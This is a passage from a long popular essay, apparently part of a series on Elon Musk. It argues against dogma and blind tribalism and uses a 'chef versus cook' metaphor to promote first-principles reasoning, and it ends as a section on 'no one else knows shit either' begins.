A common example of this in today’s world is that many people I know were raised by people who were raised by people who went through the Great Depression. If you solicit career advice from someone born in the US in the 1920s, there’s a good chance you’ll get an answer pumped out by this software:
Grandma Software
The person has lived a long life and has made it all the way to 2015, but their software was coded during the Great Depression, and if they’re not the type to regularly self-reflect and evolve, they still do their thinking with software from 1930. And if they installed that same software in their children’s heads and their children then passed it on to their own children, a member of Generation Y today might feel too scared to pursue an entrepreneurial or artistic endeavor and be totally unaware that they’re actually being haunted by the ghost of the Great Depression.
When old software is installed on new computers, people end up with a set of values not necessarily based on their own deep thinking, a set of beliefs about the world not necessarily based on the reality of the world they live in, and a bunch of opinions they might have a hard time defending with an honest heart.
In other words, a whole lot of convictions not really based on actual data. We have a word for that.
Dogma
I don’t know what’s the matter with people: they don’t learn by understanding, they learn by some other way—by rote or something. Their knowledge is so fragile! —Richard Feynman
Dogma is everywhere and comes in a thousand different varieties—but the format is generally the same:
X is true because [authority] says so. The authority can be many things.
Because I said so 2
Dogma, unlike first principles reasoning, isn’t customized to the believer or her environment and isn’t meant to be critiqued and adjusted as things change. It’s not software to be coded—it’s a printed rulebook. Its rules may be originally based on reasoning by a certain kind of thinker in a certain set of circumstances, at a time far in the past or a place far away, or it may be based on no reasoning at all. But that doesn’t matter because you’re not supposed to dig too deep under the surface anyway—you’re just supposed to accept it, embrace it, and live by it. No evidence needed.
You may not like living by someone else’s dogma, but you’re left without much choice. When your childhood attempts at understanding are met with “Because I said so,” and you absorb the implicit message “Your own reasoning capability is shit, don’t even try, just follow these rules so you don’t fuck your life up,” you grow up with little confidence in your own reasoning process. When you’re never forced to build your own reasoning pathways, you’re able to skip the hard process of digging deep to discover your own values and the sometimes painful experience of testing those values in the real world and learning you want to adjust them—and so you grow up a total reasoning amateur.
Only strong reasoning skills can carve a unique life path, and without them, dogma will quickly have you living someone else’s life. Dogma doesn’t know you or care about you and is often completely wrong for you—it’ll have a would-be happy painter spending their life as a lawyer and a would-be happy lawyer spending their life as a painter.
But when you don’t know how to reason, you don’t know how to evolve or adapt. If the dogma you grew up with isn’t working for you, you can reject it, but as a reasoning amateur, going it alone usually ends with you finding another dogma lifeboat to jump onto—another rulebook to follow and another authority to obey. You don’t know how to code your own software, so you install someone else’s.
People don’t do any of this intentionally—usually if we reject a type of dogma, our intention is to break free of a life of dogmatic thinking all together and brave the cold winds of independent reasoning. But dogmatic thinking is a hard habit to break, especially when it’s all you know. I have a friend who just had a baby, and she told me that she was so much more open-minded than her parents, because they wanted her to have a prestigious career, but she’d be open to her daughter doing anything. After a minute, she thought about it, and said, “Well actually, no, what I mean by that is if she wanted to go do something like spend her life on a farm in Montana, I’d be fine with that and my parents never would have been—but if she said she wanted to go work at a hedge fund, I’d kill her.” She realized mid-sentence that she wasn’t free of the rigid dogmatic thinking of her parents, she had just changed dogma brands.
This is the dogma trap, and it’s hard to escape from. Especially since dogma has a powerful ally—the group.
Tribes
Some things I think are very conservative, or very liberal. I think when someone falls into one category for everything, I’m very suspicious. It doesn’t make sense to me that you’d have the same solution to every issue. —Louis C.K.
What most dogmatic thinking tends to boil down to is another good Seth Godin phrase:
People like us do stuff like this.
It’s the rallying cry of tribalism.
There’s an important distinction to make here. Tribalism tends to have a negative connotation, but the concept of a tribe itself isn’t bad. All a tribe is is a group of people linked together by something they have in common—a religion, an ethnicity, a nationality, family, a philosophy, a cause. Christianity is a tribe. The Democratic Party is a tribe. Australians are a tribe. Radiohead fans are a tribe. Arsenal fans are a tribe. The musical theater scene in New York is a tribe. Temple University is a tribe. And within large, loose tribes, there are smaller, tighter, sub-tribes. Your extended family is a tribe, of which your immediate family is a sub-tribe. Americans are a tribe, of which Texans are a sub-tribe, of which Evangelical Christians in Amarillo, Texas is a sub-sub-tribe.
What makes tribalism a good or bad thing depends on the tribe member and their relationship with the tribe. In particular, one simple distinction:
Tribalism is good when the tribe and the tribe member both have an independent identity and they happen to be the same. The tribe member has chosen to be a part of the tribe because it happens to match who he really is. If either the identity of the tribe or the member evolves to the point where the two no longer match, the person will leave the tribe. Let’s call this conscious tribalism.
Tribalism is bad when the tribe and tribe member’s identity are one and the same. The tribe member’s identity is determined by whatever the tribe’s dogma happens to say. If the identity of the tribe changes, the identity of the tribe member changes with it in lockstep. The tribe member’s identity can’t change independent of the tribal identity because the member has no independent identity. Let’s call this blind tribalism.
With conscious tribalism, the tribe member and his identity comes first. The tribe member’s identity is the alpha dog, and who he is determines the tribes he’s in. With blind tribalism, the tribe comes first. The tribe is the alpha dog and it’s the tribe that determines who he is.
This isn’t black and white—it’s a spectrum—but when someone is raised without strong reasoning skills, they may also lack a strong independent identity and end up vulnerable to the blind tribalism side of things—especially with the various tribes they were born into. That’s what Einstein was getting at when he said, “Few people are capable of expressing with equanimity opinions which differ from the prejudices of their social environment. Most people are even incapable of forming such opinions.”
A large tribe like a religion or a political party or a nation will contain members who fall across the whole range of the blind-to-conscious spectrum. But some tribes themselves will be the type to attract a certain type of follower. It makes logical sense that the more rigid and certain and dogmatic the tribe, the more likely it’ll be to attract blind tribe members. ISIS is going to have a far higher percentage of blind tribe members than the London Philosophy Club.
The allure of dogmatic tribes makes sense—they appeal to very core parts of human nature.
Humans crave connection and camaraderie, and a guiding dogma is a common glue to bond together a group of unique individuals as one.
Humans want internal security, and for someone who grows up feeling shaky about their own distinctive character, a tribe and its guiding dogma is a critical lifeline—a one-stop shop for a full suite of human opinions and values.
Humans also long for the comfort and safety of certainty, and nowhere is conviction more present than in the groupthink of blind tribalism. While a scientist’s data-based opinions are only as strong as the evidence she has and inherently subject to change, tribal dogmatism is an exercise in faith, and with no data to be beholden to, blind tribe members believe what they believe with certainty.
We discussed why math has proofs, science has theories, and in life, we should probably limit ourselves to hypotheses—but blind tribalism proceeds with the confidence of the mathematician:
Given (because the tribe says so): A = B
Given (because the tribe says so): B = C + D
Therefore (because the tribe says so): A = C + D
And since so many others in the tribe feel certain about things, your own certainty is reassured and reinforced.
But there’s a heavy cost to these comforts. Insecurity can be solved the hard way or the easy way—and by giving people the easy option, dogmatic tribes remove the pressure to do the hard work of evolving into a more independent person with a more internally-defined identity. In that way, dogmatic tribes are an enabler of the blind tribe member’s deficiencies.
The sneaky thing about both rigid tribal dogma and blind membership is that they like to masquerade as open-minded thought with conscious membership. I think many of us may be closer to the blind membership side of things with certain tribes we’re a part of than we recognize—and those tribes we’re a part of may not be as open-minded as we tend to think.
A good test for this is the intensity of the us factor. That key word in “People like us do stuff like this” can get you into trouble pretty quickly.
Us feels great. A major part of the appeal of being in a tribe is that you get to be part of an Us, something humans are wired to seek out. And loose Us is nice—like the Us among conscious, independent tribe members.
But the Us in blind tribalism is creepy. In blind tribalism, the tribe’s guiding dogma doubles as the identity of the tribe members, and the Us factor enforces that concept. Conscious tribe members reach conclusions—blind tribe members are conclusions. With a blind Us, if the way you are as an individual happens to contain opinions, traits, or principles that fall outside the outer edges of the dogma walls, they will need to be shed—or things will get ugly. By challenging the dogma of your tribe, you’re challenging both the sense of certainty the tribe members gain their strength from and the clear lines of identity they rely on.
The best friend of a blind Us is a nemesis Us—Them. Nothing unites Us like a collectively hated anti-Us, and the blind tribe is usually defined almost as much by hating the dogma of Them as it is by abiding by the dogma of Us.
Whatever element of rigid, identity-encompassing blindness is present in your own tribal life will reveal itself when you dare to validate any part of the rival Them dogma.
Give it a try. The next time you’re with a member of a tribe you’re a part of, express a change of heart that aligns you on a certain topic with whoever your tribe considers to be Them. If you’re a religious Christian, tell people at church you’re not sure anymore that there’s a God. If you’re an artist in Boulder, explain at the next dinner party that you think global warming might actually be a liberal hoax. If you’re an Iraqi, tell your family that you’re feeling pro-Israel lately. If you and your husband are staunch Republicans, tell him you’re coming around on Obamacare. If you’re from Boston, tell your friends you’re pulling for the Yankees this year because you like their current group of players.
If you’re in a tribe with a blind mentality of total certainty, you’ll probably see a look of horror. It won’t just seem wrong, it’ll seem like heresy. They might get angry, they might passionately try to convince you otherwise, they might cut off the conversation—but there will be no open-minded conversation. And because identity is so intertwined with beliefs in blind tribalism, the person actually might feel less close to you afterwards. Because for rigidly tribal people, a shared dogma plays a more important role in their close relationships than they might recognize.
Most of the major divides in our world emerge from blind tribalism, and on the extreme end of the spectrum—where people are complete sheep—blind tribalism can lead to terrifying things. Like those times in history when a few charismatic bad guys can build a large army of loyal foot soldiers, just by displaying strength and passion. Because blind tribalism the true villain behind our grandest-scale atrocities—
Equations
Most of us probably wouldn’t have joined the Nazi party, because most of us aren’t on the extreme end of the blind-to-conscious spectrum. But I don’t think many of us are on the other end either. Instead, we’re usually somewhere in the hazy middle—in the land of cooks.4
The Cook and the Chef
The difference between the way Elon thinks and the way most people think is kind of like the difference between a cook and a chef.
The words “cook” and “chef” seem kind of like synonyms. And in the real world, they’re often used interchangeably. But in this post, when I say chef, I don’t mean any ordinary chef. I mean the trailblazing chef—the kind of chef who invents recipes. And for our purposes, everyone else who enters a kitchen—all those who follow recipes—is a cook.
Everything you eat—every part of every cuisine we know so well—was at some point in the past created for the first time. Wheat, tomatoes, salt, and milk go back a long time, but at some point, someone said, “What if I take those ingredients and do this…and this…..and this……” and ended up with the world’s first pizza. That’s the work of a chef.
Since then, god knows how many people have made a pizza. That’s the work of a cook.
The chef reasons from first principles, and for the chef, the first principles are raw edible ingredients. Those are her puzzle pieces and she works her way upwards from there, using her experience, her instincts, and her taste buds.
The cook works off of some version of what’s already out there—a recipe of some kind, a meal she tried and liked, a dish she watched someone else make.
Cooks span a wide range. On one end, you have cooks who only cook by following a recipe to the T—carefully measuring every ingredient exactly the way the recipe dictates. The result is a delicious meal that tastes exactly the way the recipe has it designed. Down the range a bit, you have more of a confident cook—someone with experience who gets the general gist of the recipe and then uses her skills and instincts to do it her own way. The result is something a little more unique to her style that tastes like the recipe but not quite. At the far end of the cook range, you have an innovator who makes her own concoctions. A lamb burger with a vegetable bun, a peanut butter and jelly pizza, a cinnamon pumpkin seed cake.5
But what all of these cooks have in common is their starting point is something that already exists. Even the innovative cook is still making a version of a burger, a pizza, and a cake.
At the very end of the spectrum, you have the chef. A chef might make good food or terrible food, but whatever she makes, it’s a result of her own reasoning process, from the selection of raw ingredients at the bottom to the finished dish at the top.
Chef-Cook Spectrum
In the culinary world, there’s nothing wrong with being a cook. Most people are cooks because for most people, inventing recipes isn’t a goal of theirs.
But in life—when it comes to the reasoning “recipes” we use to churn out a decision—we may want to think twice about where we are on the cook-chef spectrum.
On a typical day, a “reasoning cook” and a “reasoning chef” don’t operate that differently. Even the chef becomes quickly exhausted by the mental energy required for first principles reasoning, and usually, doing so isn’t worth his time. Both types of people spend an average day with their brain software running on auto-pilot and their conscious decision-making centers dormant.
But then comes a day when something new needs to be figured out. Maybe the cook and the chef are each given the new task at work to create a better marketing strategy. Or maybe they’re unhappy with that job and want to think of what business to start. Maybe they have a crush on someone they never expected to have feelings for and they need to figure out what to do about it.
Whatever this new situation is, auto-pilot won’t suffice—this is something new and neither the chef’s nor the cook’s software has done this before. Which leaves only two options:
Create. Or copy.
The chef says, “Ugh okay, here we go,” rolls up his sleeves, and does what he always does in these situations—he switches on the active decision-making part of his software and starts to go to work. He looks at what data he has and seeks out what more he needs. He thinks about the current state of the world and reflects on where his values and priorities are. He gathers together those relevant first principles ingredients and starts puzzling together a reasoning pathway. It takes some hard work, but eventually, the pathway brings him to a hypothesis. He knows it’s probably wrong-ish, and as new data emerges, he’ll “taste-test” the hypothesis and adjust it. He keeps the decision-making center on standby for the next few weeks as he makes a bunch of early adjustments to the flawed hypothesis—a little more salt, a little less sugar, one prime ingredient that needs to be swapped out for another. Eventually, he’s satisfied enough with how things are going to move back into auto-pilot mode. This new decision is now part of the automated routine—a new recipe is in the cookbook—and he’ll check in on it to make adjustments every once in a while or as new pertinent data comes in, the way he does for all parts of his software.
The cook has no idea what’s going on in the last paragraph. The reasoning cook’s software is called “Because the recipe said so,” and it’s more of a computerized catalog of recipes than a computer program. When the cook needs to make a life decision, he goes through his collection of authority-written recipes, finds the one he trusts in that particular walk of life, and reads through the steps to see what to do—kind of like WWJD, except the J is replaced by whatever authority is most trusted in that area. For most questions, the authority is the tribe, since the cook’s tribal dogma covers most standard decisions. But in this particular case, the cook leafed through the tribe’s cookbook and couldn’t find any section about this type of decision. So he needs to get a hold of a recipe from another authority he trusts with this type of thing. Once the cook finds the right recipe, he can put it in his catalog and use it for all future decisions on this matter.
First, the cook tries a few friends. His catalog doesn’t have the needed info, but maybe one of theirs does. He asks them for their advice—not so he can use it as additional thinking to supplement his own, but so it can become his own thinking.
If that doesn’t yield any strongly-opinionated results, he’ll go to the trusty eternal backstop—conventional wisdom.
Society as a whole is its own loose tribe, often spanning your whole nation or even your whole part of the world, and what we call “conventional wisdom” is its guiding dogma cookbook—online and available to the public. Typically, the larger the tribe, the more general and more outdated the dogma—and the conventional wisdom database runs like a DMV website last updated in 1992. But when the cook has nowhere else to turn, it’s like a trusty old friend.
And in this case—let’s say the cook is thinking of starting a business and wants to know what the possibilities are—conventional wisdom has him covered. He types the command into the interface, waits a few minutes, and then the system pumps out its answer:
CWDOS
The cook, thoroughly discouraged, thanks the machine and updates his Reality box accordingly.
Cook reality box simple
With the decision made (not to start a business), he switches his software back into auto-pilot mode. Done and done.
Musk calls the cook’s way of thinking “reasoning by analogy” (as opposed to reasoning by first principles), which is a nice euphemism. The next time a kid gets caught copying answers from another student’s exam during the test, he should just explain that he was reasoning by analogy.
If you start looking for it, you’ll see the chef/cook thing happening everywhere. There are chefs and cooks in the worlds of music, art, technology, architecture,6 writing, business, comedy, marketing, app development, football coaching, teaching, and military strategy. Sometimes the chef is the one brave enough to go for something big—other times, the chef is the one with the strength of character to step out of the game and revert back to the small. And in each case, though both parties are usually just on autopilot, mindlessly playing the latest album again and again at concerts, it’s in those key moments when it’s time to write a new album—those moments of truth in front of a clean canvas, a blank Word doc, an empty playbook, a new sheet of blueprint paper, a fresh whiteboard—that the chef and the cook reveal their true colors. The chef creates, while the cook, in some form or another, copies.
Line of cooks
And the difference in outcome is enormous. For cooks, even the more innovative kind, there’s almost always a ceiling on the size of the splash they can make in the world, unless there’s some serious luck involved. Chefs aren’t guaranteed to do anything good, but when there’s a little talent and a lot of persistence, they’re almost certain to make a splash.
No one talks about the “reasoning industry,” but we’re all part of it, and when it comes to chefs and cooks, it’s no different than any other industry. We’re working in the reasoning industry every time we make a decision.
Your current life, with all its facets and complexity, is like a reasoning industry album. The question is, how did that set of songs come to be? How were the songs composed, and by whom? And in those critical do-or-die moments when it’s time to write a new song, how do you do your creating? Do you dig deep into yourself? Do you start with the drumbeat and chords of an existing song and write your own melody on top of it? Do you just play covers?
I know what you want the answers to these questions to be. This is a straightforward one—it’s clearly better to be a chef. But unlike the case with most major distinctions in life—hard-working vs. lazy, ethical vs. dishonest, considerate vs. selfish—when the chef/cook distinction passes right in front of us, we often don’t even notice it’s there.
Missing the Distinction
Like the culinary world’s cook-to-chef range, the real world’s cook-to-chef range isn’t binary—it lies on a spectrum:
Chef-Cook Life Spectrum
But I’m pretty sure that when most of us look at that spectrum, we think we’re farther to the right than we actually are. We’re usually more cook-like than we realize—we just can’t see it from where we’re standing.
For example—
Cooks are followers—by definition. They’re a cook because in whatever they’re doing, they’re following some kind of recipe. But most of us don’t think of ourselves as followers.
A follower, we think, is a weakling with no mind of their own. We think about leadership positions we’ve held and initiatives we’ve taken at work and the way we never let friends boss us around, and we take these as evidence that we’re no follower. Which in turn means that we’re not just a cook.
But the problem is—the only thing all of that proves is that you’re no follower within your tribe. As Einstein meanly put it:
In order to form an immaculate member of a flock of sheep one must, above all, be a sheep.
In other words, you might be a star and a leader in your world or in the eyes of your part of society, but if the core reason you picked that goal in the first place was because your tribe’s cookbook says that it’s an impressive thing and it makes the other tribe members gawk, you’re not being a leader—you’re being a super-successful follower. And, as Einstein says, no less of a cook than all those whom you’ve impressed.
To see the truth, you need to zoom way out until you can see the real leader of the cooks—the cookbook.
But we don’t tend to zoom out, and when we look around at our life, zoomed in, what appears to be a highly unique and independent self may be an optical illusion.7 What often feels like independent reasoning when zoomed out is actually playing connect-the-dots on a pre-printed set of steps laid out by someone else. What feel like personal principles might just be the general tenets of your tribe. What feel like original opinions may have actually been spoon-fed to us by the media or our parents or friends or our religion or a celebrity. What feels like Roark might actually be Keating. What feels like our chosen life path could just be one of a handful of pre-set, tribe-approved yellow brick roads. What feels like creativity might be filling in a coloring book—and making sure to stay inside the lines.
Because of this optical illusion, we’re unable to see the flaws in our own thinking or recognize an unusually great thinker when we see one. Instead, when a superbly science-minded, independent-thinking chef like Elon Musk or Steve Jobs or Albert Einstein comes around, what do we attribute their success to?
Awesome fucking hardware.
When we look at Musk, we see someone with genius, with vision, with superhuman balls. All things, we assume, he was more or less born with. So to us, the spectrum looks more like this:
Chef-Cook Life Spectrum Skewed
The way we see it, we’re all a bunch of independent-thinking chefs—and it’s just that Musk is a really impressive chef.
Which is both A) overrating Musk and B) overrating ourselves. And completely missing the real story.
Musk is an impressive chef for sure, but what makes him such an extreme standout isn’t that he’s impressive—it’s that most of us aren’t chefs at all.
It’s like a bunch of typewriters looking at a computer and saying, “Man, that is one talented typewriter.”
The reason we have such a hard time seeing what’s really going on is that we don’t get that brain software is even a thing. We don’t think of brains as computers, so we don’t think about the distinction between hardware and software at all. When we think about the brain, we think only about the hardware—the thing we’re born with and are powerless to change or improve. Much less tangible to us is the concept of how we reason. We see reasoning as a thing that just kind of happens, like our bodies’ blood flow—it’s a process that automatically happens, and there’s not much else to say or do about it.
And if we can’t even see the hardware/software distinction, we certainly can’t see the more nuanced chef software vs. cook software distinction.
By not seeing our thinking software for what it is—a critical life skill, something that can be learned, practiced, and improved, and the major factor that separates the people who do great things from those who don’t—we fail to realize where the game of life is really being played. We don’t recognize reasoning as a thing that can be created or copied—and in the same way that causes us to mistake our own cook-like behavior for independent reasoning, we then mistake the actual independent reasoning of the chef for exceptional and magical abilities.
Three examples:
1) We mistake the chef’s clear view of the present for vision into the future.
Musk’s sister Tosca said “Elon has already gone to the future and come back to tell us what he’s found.”7 This is how a lot of people feel about Musk—that he’s a visionary, that he can somehow see things we cannot. We see it like this:
Musk Visionary 1
But actually, it’s like this:
Musk Visionary 2
Conventional wisdom is slow to move, and there’s significant lag time between when something becomes reality and when conventional wisdom is revised to reflect that reality. And by the time it does, reality has moved on to something else. But chefs don’t pay attention to that, reasoning instead using their eyes and ears and experience. By ignoring conventional wisdom in favor of simply looking at the present for what it really is and staying up-to-date with the facts of the world as they change in real-time—in spite of what conventional wisdom has to say—the chef can act on information the rest of us haven’t been given permission to act on yet.
2) We mistake the chef’s accurate understanding of risk for courage.
Remember this ElonSpeak quote from earlier?
When I was a little kid, I was really scared of the dark. But then I came to understand, dark just means the absence of photons in the visible wavelength—400 to 700 nanometers. Then I thought, well it’s really silly to be afraid of a lack of photons. Then I wasn’t afraid of the dark anymore after that.8
That’s just a kid chef assessing the actual facts of a situation and deciding that his fear was misplaced.
As an adult, Musk said this:
Sometimes people fear starting a company too much. Really, what’s the worst that could go wrong? You’re not gonna starve to death, you’re not gonna die of exposure—what’s the worst that could go wrong?
Same quote, right?
In both cases, Musk is essentially saying, “People consider X to be scary, but their fear is not based on logic, so I’m not scared of X.” That’s not courage—that’s logic.
Courage means doing something risky. Risk means exposing yourself to danger. We intuitively understand this—that’s why most of us wouldn’t call child Elon courageous for sleeping with the lights off. Courage would be a weird word to use there because no actual danger was involved.
All Elon’s saying in the second quote is that being scared to start a company is the adult version of being scared of the dark. It’s not actually dangerous.
So when Musk put his entire fortune down and on SpaceX and Tesla, he wasn’t being bold as fuck, but courageous? Not the right word. It was a case of a chef taking a bunch of information he had and puzzling together a plan that seemed logical. It’s not that he was sure he’d succeed—in fact, he thought SpaceX in particular had a reasonable probability of failure—it’s just that nowhere in his assessments did he foresee danger.
3) We mistake the chef’s originality for brilliant ingenuity.
People believe thinking outside the box takes intelligence and creativity, but it’s mostly about independence. When you simply ignore the box and build your reasoning from scratch, whether you’re brilliant or not, you end up with a unique conclusion—one that may or may not fall within the box.
When you’re in a foreign country and you decide to ditch the guidebook and start wandering aimlessly and talking to people, unique things always end up happening. When people hear about those things, they’ll think of you as a pro traveler and a bold adventurer—when all you really did is ditch the guidebook.
Likewise, when an artist or scientist or businessperson chef reasons independently instead of by analogy, and their puzzling happens to both A) turn out well and B) end up outside the box, people call it innovation and marvel at the chef’s ingenuity. When it turns out really well, all the cooks do what they do best—copy—and now it’s called a revolution.
Simply by refraining from reasoning by analogy, the chef opens up the possibility of making a huge splash with every project. When Steve Jobs8 and Apple turned their attention to phones, they didn’t start by saying, “Okay well people seem to like this kind of keyboard more than that kind, and everyone seems unhappy with the difficulty of hitting the numbers on their keyboards—so let’s get creative and make the best phone keyboard yet!” They simply asked, “What should a mobile device be?” and in their from-scratch reasoning, a physical keyboard didn’t end up as part of the plan at all. It didn’t take genius to come up with the design of the iPhone—it’s actually pretty logical—it just took the ability to not copy.
Different version of the same story with the invention of the United States. When the American forefathers found themselves with a new country on their hands, they didn’t ask, “What should the rules be for selecting our king, and what should the limitations of his power be?” A king to them was what a physical keyboard was to Apple. Instead, they asked, “What should a country be and what’s the best way to govern a group of people?” and by the time they had finished their puzzling, a king wasn’t part of the picture—their first principles reasoning led them to believe that John Locke had a better plan and they worked their way up from there.
History is full of the stories of chefs creating revolutions of apparent ingenuity through simple first principles reasoning. Genghis Khan organizing a smattering of tribes that had been fragmented for centuries using a powers of ten system in order to build one grand tribe that could sweep the world. Henry Ford creating cars with the out-of-the-box manufacturing technique of assembly-line production in order to bring cars to the masses for the first time. Marie Curie using unconventional methods to pioneer the theory of radioactivity and topple the “atoms are indivisible” assumption on its head (she won a Nobel Prize in both physics and chemistry—two prizes reserved exclusively for chefs). Martin Luther King taking a nonviolent Thoreau approach to a situation normally addressed by riots. Larry Page and Sergey Brin ignoring the commonly-used methods of searching the internet in favor of what they saw as a more logical system that based page importance on the number of important sites that linked to it. The 1966 Beatles deciding to stop being the world’s best cooks, ditching the typical songwriting styles of early-60s bands, including their own, and become music chefs, creating a bunch of new types of songs from scratch that no one had heard before.
Whatever the time, place, or industry, anytime something really big happens, there’s almost always an experimenting chef at the center of it—not being anything magical, just trusting their brain and working from scratch. Our world, like our cuisines, was created by these people—the rest of us are just along for the ride.
Yeah, Musk is smart as fuck and insanely ambitious—but that’s not why he’s beating us all. What makes Musk so rad is that he’s a software outlier. A chef in a world of cooks. A science geologist in a world of flood geologists. A brain software pro in a world where people don’t realize brain software is a thing.
That’s Elon Musk’s secret sauce.
Which is why the real story here isn’t Musk. It’s us.
The real puzzle in this series isn’t why Elon Musk is trying to end the era of gas cars or why he’s trying to land a rocket or why he cares so much about colonizing Mars—it’s why Elon Musk is so rare.
The curious thing about the car industry isn’t why Tesla is focusing so hard on electric cars, and the curious thing about the aerospace industry isn’t why SpaceX is trying so hard to make rockets reusable—the fascinating question is why they’re the only companies doing so.
We spent this whole time trying to figure out the mysterious workings of the mind of a madman genius only to realize that Musk’s secret sauce is that he’s the only one being normal. And in isolation, Musk would be a pretty boring subject—it’s the backdrop of us that makes him interesting. And it’s that backdrop that this series is really about.
So…what’s the deal with us? How did we end up so scared and cook-like? And how do we learn to be more like the chefs of the world, who seem to so effortlessly carve their own way through life? I think it comes down to three things.
How to Be a Chef
Anytime there’s a curious phenomenon within humanity—some collective insanity we’re all suffering from—it usually ends up being evolution’s fault. This story is no different.
When it comes to reasoning, we’re biologically inclined to be cooks, not chefs, which relates back to our tribal evolutionary past. First, it’s a better tribal model for most people to be cooks. In 50,000 BC, tribes full of independent thinkers probably suffered from having too many chefs in the kitchen, which would lead to too many arguments and factions within the tribe. A tribe with a strong leader at the top and the rest of the members simply following the leader would fare better. So those types of tribes passed on their genes more. And now we’re the collective descendants of the more cook-like people.
Second, it’s about our own well-being. It’s not in our DNA to be chefs because human self-preservation never depended upon independent thinking—it rode on fitting in with the tribe, on staying in favor with the chief, on following in the footsteps of the elders who knew more about staying alive than we did. And on teaching our children to do the same—which is why we now live in a cook society where cook parents raise their kids by telling them to follow the recipe and stop asking questions about it.
Thinking like cooks is what we’re born to do because what we’re born to do is survive.
But the weird thing is, we weren’t born into a normal human world. We’re living in the anomaly, when for many of the world’s people, survival is easy. Today’s privileged societies are full of anomaly humans whose primary purpose is already taken care of, softening the deafening roar of unmet base needs and allowing the nuanced and complex voice of our inner selves to awaken.
The problem is, most of our heads are still running on some version of the 50,000-year-old survival software—which kind of wastes the good luck we have to be born now.
It’s an unfortunate catch-22—we continue to think like cooks because we can’t absorb the epiphany that we live in an anomaly world where there’s no need to be cooks, and we can’t absorb that epiphany because we think like cooks and cooks don’t know how to challenge and update their own software.
This is the vicious cycle of our time—and the secret of the chef is that they somehow snapped out of it.
So how do we snap out of the trance?
I think there are three major epiphanies we need to absorb—three core things the chef knows that the cook doesn’t:
Epiphany 1) You don’t know shit.
You don't know shit
The flood geologists of the 17th and 18th centuries weren’t stupid. And they weren’t anti-science. Many of them were just as accomplished in their fields as their science geologist colleagues.
But they were victims—victims of a religious dogma they were told to believe without question. The recipe they followed was scripture, a recipe that turned out to be wrong. And as a result, they proceeded on their path with a fatal flaw in their thinking—a software bug that told them that one of the undeniable first principles when thinking about the Earth was that it began 6,000 years ago and that there had been a flood of the most epic proportions.
With that bug in place, all further computations were moot. Any reasoning tree that puzzled upwards with those assumptions at its root had no chance of finding truth.
Even more than being victims of any dogma, the flood geologists were victims of their own certainty. Without certainty, dogma has no power. And when data is required in order to believe something, false dogma has no legs to stand on. It wasn’t the church dogma that hindered the flood geologists, it was the church mentality of faith-based certainty.
That’s what Stephen Hawking meant when he said, “The greatest enemy of knowledge is not ignorance, it is the illusion of knowledge.” Neither the science geologist nor the flood geologist started off with knowledge. But what gave the science geologist the power to seek out the truth was knowing that he had no knowledge. The science geologists subscribed to the lab mentality, which starts by saying “I don’t know shit” and works upwards from there.
If you want to see the lab mentality at work, just search for famous quotes of any prominent scientist and you’ll see each one of them expressing the fact that they don’t know shit.
Here’s Isaac Newton: To myself I am only a child playing on the beach, while vast oceans of truth lie undiscovered before me.
And Richard Feynman: I was born not knowing and have had only a little time to change that here and there.
And Niels Bohr: Every sentence I utter must be understood not as an affirmation, but as a question.
Musk has said his own version: You should take the approach that you’re wrong. Your goal is to be less wrong.9
The reason these outrageously smart people are so humble about what they know is that as scientists, they’re aware that unjustified certainty is the bane of understanding and the death of effective reasoning. They firmly believe that reasoning of all kinds should take place in a lab, not a church.
If we want to become more chef-like, we have to make sure we’re doing our thinking in a lab. Which means identifying which parts of our thinking are currently sitting in church.
But that’s a hard thing to do because most of us have the same relationship with our own software that my grandmother has with her computer:9 It’s this thing someone put there, we use it when we need to, it somehow magically works, and we hope it doesn’t break. It’s the way we are with a lot of the things we own, where we’re just the dumb user, not the pro. We know how to use our car, microwave, phone, our electric toothbrush, but if something breaks, we take it to the pro to fix it because we have no idea how it works.
But that’s not a great life model when it comes to brain software, and it usually leads to us making the same mistakes and living with the same results year after year after year, because our software remains unchanged. Eventually, we might wake up one day feeling like Breaking Bad’s Walter White, when he said, “Sometimes I feel like I never actually make, any of my own… choices. I mean, my entire life it just seems I never… had a real say about any of it.” If we want to understand our own thinking, we have to stop being the dumb user of our own software and start being the pro—the auto mechanic, the electrician, the computer geek.
If you were alone in a room with a car and wanted to figure out how it worked, you’d probably start by taking it apart as much as you could and examining the parts and how they all fit together. To do the same with our thinking, we need to revert to our four-year-old selves and start deconstructing our software by resuming the Why game our parents and teachers shut down decades ago. It’s time to roll up our sleeves, pop open the hood, and get our hands dirty with a bunch of not-that-fun questions about what we truly want, what’s truly possible, and whether the way we’re living our lives follows logically from those things.
With each of these questions, the challenge is to keep asking why until you hit the floor—and the floor is what will tell you whether you’re in a church or a lab for that particular part of your life. If a floor you hit is one or more first principles that represent the truth of reality or your inner self and the logic going upwards stays accurate to that foundation, you’re in the lab. If a Why? pathway hits a floor called “Because [authority] said so”—if you go down and down and realize at the bottom that the whole thing is just because you’re taking your parent’s or friend’s or religion’s or society’s word for it—then you’re in church there. And if the tenets of that church don’t truly resonate with you or reflect the current reality of the world—if it turns out that you’ve been working off of the wrong recipe—then whatever conclusions have been built on top of it will be just as wrong. As demonstrated by the flood geologists, a reasoning chain is only as strong as its weakest link.
False Dogma 1
Astronomers once hit a similar wall in their progress trying to calculate the trajectories of the sun and planets in the Solar System. Then one day they discovered that the sun was at the center of things, not the Earth, and suddenly, all the perplexing calculations made sense, and progress leapt forward. Had they played the Why game earlier, they’d have run into a dogmatic floor right after the question “But why do we know that the Earth is in the center of everything?”
People’s lives are no different, which is why it’s so important to find the toxic lumps of false dogma tucked inside the layers of your reasoning software. Identifying one and adjusting it can strengthen the whole chain above and create a breakthrough in your life.
False Dogma 2
The thing you really want to look closely for is unjustified certainty. Where in life do you feel so right about something that it doesn’t qualify as a hypothesis or even a theory, but it feels like a proof? When there’s proof-level certainty, it means either there’s some serious concrete and verified data underneath it—or it’s faith-based dogma. Maybe you feel certain that quitting your job would be a disaster or certain that there’s no god or certain that it’s important to go to college or certain that you’ve always had a great time on rugged vacations or certain that everyone loves it when you break out the guitar during a group hangout—but if it’s not well backed-up by data from what you’ve learned and experienced, it’s at best a hypothesis and at worst a completely false piece of dogma.
And if thinking about all of that ends with you drowning in some combination of self-doubt, self-loathing, and identity crisis, that’s perfect. This first epiphany is about humility. Humility is by definition a starting point—and it sends you off on a journey from there. The arrogance of certainty is both a starting point and an ending point—no journeys needed. That’s why it’s so important that we begin with “I don’t know shit.” That’s when we know we’re in the lab.
Epiphany 2) No one else knows shit either.
No one else knows shit
Let me illustrate a little story for you.
Emperor 1Emperor 2Emperor 3Emperor 4
Emperor 5Emperor 6
